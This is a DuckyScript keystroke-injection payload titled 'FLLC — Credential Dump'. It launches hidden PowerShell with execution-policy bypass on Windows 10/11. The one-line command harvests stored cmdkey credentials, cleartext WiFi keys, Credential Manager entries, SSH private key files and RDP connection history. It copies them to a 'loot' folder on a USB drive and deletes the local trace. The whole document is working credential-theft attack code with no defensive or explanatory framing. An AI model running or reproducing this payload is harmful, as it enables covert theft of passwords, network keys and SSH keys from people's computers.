REM ================================================
REM  FLLC — Credential Dump
REM  Extracts saved credentials from Windows Vault,
REM  cmdkey, and WiFi profiles. Saves to USB.
REM  Target: Windows 10/11 | Time: ~10 seconds
REM ================================================

DELAY 800
GUI r
DELAY 500
STRING powershell -w hidden -nop -ep bypass -c "$h=hostname;$ts=Get-Date -f 'yyyyMMdd_HHmmss';$f=\"$env:TEMP\fllc_cred_$ts.txt\";$r=@();$r+='FLLC CREDENTIAL DUMP';$r+=\"Host: $h | $ts\";$r+='='*50;$r+='';$r+='--- CMDKEY STORED CREDS ---';$r+=cmdkey /list 2>&1|Out-String;$r+='--- WIFI PROFILES + KEYS ---';netsh wlan show profiles|Select-String ':(.+)$'|%{$n=$_.Matches.Groups[1].Value.Trim();$r+=\"Profile: $n\";$k=netsh wlan show profile name=$n key=clear|Select-String 'Key Content\s+:\s+(.+)$';if($k){$r+=\"  Key: $($k.Matches.Groups[1].Value.Trim())\"}else{$r+='  Key: (none)'}};$r+='';$r+='--- CREDENTIAL MANAGER ---';try{$cm=& rundll32.exe keymgr.dll,KRShowKeyMgr 2>&1;$r+=$cm|Out-String}catch{$r+='(access denied)'};$r+='';$r+='--- SSH KEYS ---';$sshDir=\"$env:USERPROFILE\.ssh\";if(Test-Path $sshDir){Get-ChildItem $sshDir -File|%{$r+=\"SSH File: $($_.Name)\";$r+=Get-Content $_.FullName|Out-String}};$r+='';$r+='--- RDP CONNECTIONS ---';try{$r+=Get-ItemProperty 'HKCU:\Software\Microsoft\Terminal Server Client\Servers\*' 2>$null|Select PSChildName,UsernameHint|Out-String}catch{};$r|Out-File $f -Encoding UTF8;$usb=(Get-WmiObject Win32_LogicalDisk|?{$_.DriveType -eq 2}|Select -First 1).DeviceID;if($usb){$ld=\"$usb\loot\";New-Item -ItemType Directory -Path $ld -Force|Out-Null;Copy-Item $f \"$ld\creds_$($h)_$ts.txt\" -Force};Remove-Item $f -Force"
ENTER
